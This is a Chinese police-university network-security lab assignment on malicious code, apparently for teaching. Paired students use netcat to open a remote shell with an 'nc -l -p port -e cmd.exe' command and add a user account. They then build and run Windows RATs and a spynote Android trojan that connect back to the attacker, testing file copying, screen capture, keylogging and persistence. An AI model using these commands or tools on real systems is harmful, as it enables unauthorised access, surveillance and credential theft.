中国人民公安大学

Chinese people’ public security university

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

学生姓名

王天宇

年级

2015级

区队

六区

指导教师

高见

 

 

信息技术与网络安全学院

2016117

 

实验任务总纲

2016—2017 学年 第 一 学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

三、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

任务一 利用NC控制电脑

NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

实验过程需要两个同学相互配合完成:

步骤一:

在受害者的机器 (同学A) 输入下面的命令:   nc.exe -l -p port -e cmd.exe   进入监听模式

步骤二:   在攻击者的机器.(同学B) 输入下面的命令:   nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

步骤三:

在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

可以继续通过命令行做一些事情。

任务二 利用木马控制电脑

相关工具:

https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

实验过程需要两个同学配合:

步骤一:

 攻击者的机器. (同学A) 打开V2014.exe程序或则star RAT,这两个木马功能类似。

步骤二:   点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回连IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。

步骤三:

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。

步骤四:

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。

  1. 文件管理,尝试拷贝文件

1.屏幕控制,尝试获取桌面

2.键盘记录,尝试获取对方击键记录

3.会话管理,重启对方机器,查看是否能自启动上线

会话管理,卸载对方的木马。

任务三 Android远控实践  所有过程截图写博客

 相关工具下载:

spynote及环境工具:

https://pan.baidu.com/s/1Olo9znpzADXMYDfi_rnjOg

android模拟器:

https://www.yeshen.com/

http://mumu.163.com/

实验步骤:

一、攻击者打开spynote软件,该软件需要先安装.netframework4.0和jdk环境。

二、配置并打开监听端口

点击Listen Port,在弹出的对话框中输入端口号,并点击Add按钮,最后点击OK,成功监听本地端口。【本过程选用3210端口,实验过程大家可以自己选择端口】

三、配置并生成木马

(1)点击Build Client按钮,弹出对话框

(2)配置回连IP和端口,IP地址填写运行spynote的机器IP,端口填写监听的端口号,本次填写3210端口。

(3)配置相关属性信息。

(4)最后点击Build按钮,在选择框中选择和spynote同处在一个文件夹中Patch-release.apk。

(5)完成后,自动打开APK生成所在的文件夹。

四、将木马安装在Android模拟其中。

五、在Spynote中控制手机

可以在spynote中看到有一台机器上线,并可以查看其基本信息。

在该机器中右键,可以看到可以对该机器进行控制的功能,从中选择4个以上的项目进行实验。

转载于:https://www.cnblogs.com/p201521460020/p/9834719.html

网络对抗技术——实验四:恶意代码技术相关推荐

  1. 20145231熊梓宏 《网络对抗》 实验四 恶意代码分析

    20145231熊梓宏 <网络对抗> 实验四 恶意代码分析 基础问题回答 1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操 ...

  2. 实验四 恶意代码技术

    学   号201421460014 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     学 ...

  3. 实验四 恶意代码技术

    实验报告 四 学   号   中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     学生姓名 ...

  4. 实验四——恶意代码技术

    学   号   201421430035   中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术 ...

  5. 20155235 《网络攻防》 实验四 恶意代码分析

    20155235 <网络攻防> 实验四 恶意代码分析 实验目的 是监控你自己系统的运行状态,看有没有可疑的程序在运行. 是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具 ...

  6. 实验四恶意代码分析技术 201421430029

    学   号:201421430029   中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术   ...

  7. 实验四 恶意代码

    中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     学生姓名 冷其航 年级 14级 区队 ...

  8. 20145230熊佳炜《网络对抗》实验四:恶意代码分析

    20145230熊佳炜<网络对抗>实验四:恶意代码分析 恶意代码 定义一:恶意代码又称恶意软件.这些软件也可称为广告软件.间谍软件.恶意共享软件.是指在未明确提示用户或未经用户许可的情况下 ...

  9. 20145209 刘一阳 《网络对抗》实验四:恶意代码分析

    20145209 刘一阳 <网络对抗>实验四:恶意代码分析 恶意代码 定义一:恶意代码又称恶意软件.这些软件也可称为广告软件.间谍软件.恶意共享软件.是指在未明确提示用户或未经用户许可的情 ...

  10. 20155222卢梓杰 实验四 恶意代码分析

    实验四 恶意代码分析 1.系统运行监控 实验步骤如下 1.使用批处理监控程序连接网络的状况 在C盘要目录下建一个文件c:\netstatlog.bat,内容如下: date /t >> c ...

最新文章

  1. 分治算法的设计思想(二分检索、二分归并排序)
  2. LeetCode简单题之有效的字母异位词
  3. oracle 大页配置,ORACLE 启用大页内存
  4. matlab智能算法30个案例分析_赞!继电保护25个事故案例分析总结,值得收藏!...
  5. Vue学习(一)-邂逅Vuejs
  6. linux下如何产生core,调试core
  7. C程序设计语言上机13,《高级语言程序设计》北大上机试题(十三)
  8. 架构选型,究竟啥时候选redis?
  9. PHP学习总结(12)——PHP入门篇之变量
  10. linux内核定时器 代码,Linux内核计时器
  11. java ojdbc14 查询数据表,Oracle10g JDBC ojdbc14 DATE类型hibernate查询时分秒问题
  12. verilog实现三人表决器
  13. 高级OS(十五) - 中断机制以及中断上下部运行和内核代码分析
  14. index.php.bak 颓废_18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
  15. 国产免费倾斜摄影模型在线发布平台,一键查看、编辑、分享场景!
  16. 机器学习分享——反向传播算法推导
  17. 通过网络共享将 Windows 10 的文件复制到 iPhone 手机上
  18. JavaScript 深拷贝与浅拷贝
  19. DBUS是什么 如何使用
  20. Mysql current_time,current_date()与now()区别

热门文章

  1. OsWatcher 使用详解
  2. Python爬虫原理与简单示例代码
  3. F1值(F-Measure)、准确率(Precision)、召回率(Recall) 菜鸡版理解
  4. 成功的道路并不拥挤,别那么早放弃
  5. css 实现三维立体旋转效果
  6. 【LaTeX笔记12】Latex分栏布局及模板使用
  7. Aspose.Words for .NET使用章节教程(2):如何处理文档分段——Aspose.Words中的分段
  8. springboot+vue新生宿舍管理系统(源码+说明文档),一款优秀的毕业设计
  9. 土包子也来爆料一下贵族的生活:高尔夫球场见闻
  10. 三菱PLC CCD控制ST程序 本PLC程序中CCD控制用的ST结构化语言,程序都有注释